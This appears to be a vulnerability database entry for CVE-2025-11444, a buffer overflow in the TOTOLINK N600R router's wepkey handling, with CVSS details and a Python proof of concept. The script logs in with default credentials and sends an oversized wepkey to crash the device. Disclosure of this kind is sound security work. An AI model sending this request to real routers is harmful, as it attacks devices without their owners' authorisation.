Security Vulnerability Report
CVE-2025-11444 CVSS 8.8 HIGH

CVE-2025-11444

Published: 2025-10-08 08:15:33
Last Modified: 2025-10-14 20:16:02

Description

A security vulnerability has been detected in TOTOLINK N600R up to 4.3.0cu.7866_B20220506. This impacts the function setWiFiBasicConfig of the file /cgi-bin/cstecgi.cgi of the component HTTP Request Handler. Such manipulation of the argument wepkey leads to buffer overflow. It is possible to launch the attack remotely. The exploit has been disclosed publicly and may be used.

CVSS Details

CVSS Score: 8.8
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:o:totolink:n600r_firmware:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:totolink:n600r:-:*:*:*:*:*:*:* - NOT VULNERABLE
TOTOLINK N600R <= 4.3.0cu.7866_B20220506

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-11444 PoC - TOTOLINK N600R setWiFiBasicConfig Buffer Overflow
# Vulnerability: Buffer overflow via wepkey parameter in setWiFiBasicConfig function
# Affected: TOTOLINK N600R <= 4.3.0cu.7866_B20220506
# File: /cgi-bin/cstecgi.cgi
import requests
import sys

TARGET_URL = "http://192.168.0.1/cgi-bin/cstecgi.cgi"

# Buffer overflow payload - adjust offset based on target binary
# The wepkey parameter is vulnerable to stack buffer overflow
PAYLOAD = "A" * 512  # Oversized wepkey value to trigger overflow

def exploit(target_ip, username="admin", password="admin"):
    """
    Exploit CVE-2025-11444: Buffer overflow in setWiFiBasicConfig via wepkey parameter
    """
    url = f"http://{target_ip}/cgi-bin/cstecgi.cgi"

    # Step 1: Authenticate to obtain session cookie (low privilege required)
    session = requests.Session()
    login_data = {
        "username": username,
        "password": password,
        "login": "1"
    }
    session.post(url, data=login_data)

    # Step 2: Send malicious request with oversized wepkey parameter
    # The setWiFiBasicConfig function processes wepkey without proper bounds checking
    exploit_data = {
        "topicurl": "setWiFiBasicConfig",
        "wepkey": PAYLOAD,  # Trigger buffer overflow
        "wepkeytype": "1",
        "wepkeylen": "64"
    }
    headers = {
        "Content-Type": "application/x-www-form-urlencoded",
        "Referer": f"http://{target_ip}/"
    }
    response = session.post(url, data=exploit_data, headers=headers)
    print(f"[*] Exploit sent. Status: {response.status_code}")
    return response

if __name__ == "__main__":
    target = sys.argv[1] if len(sys.argv) > 1 else "192.168.0.1"
    exploit(target)

References

Raw JSON Data
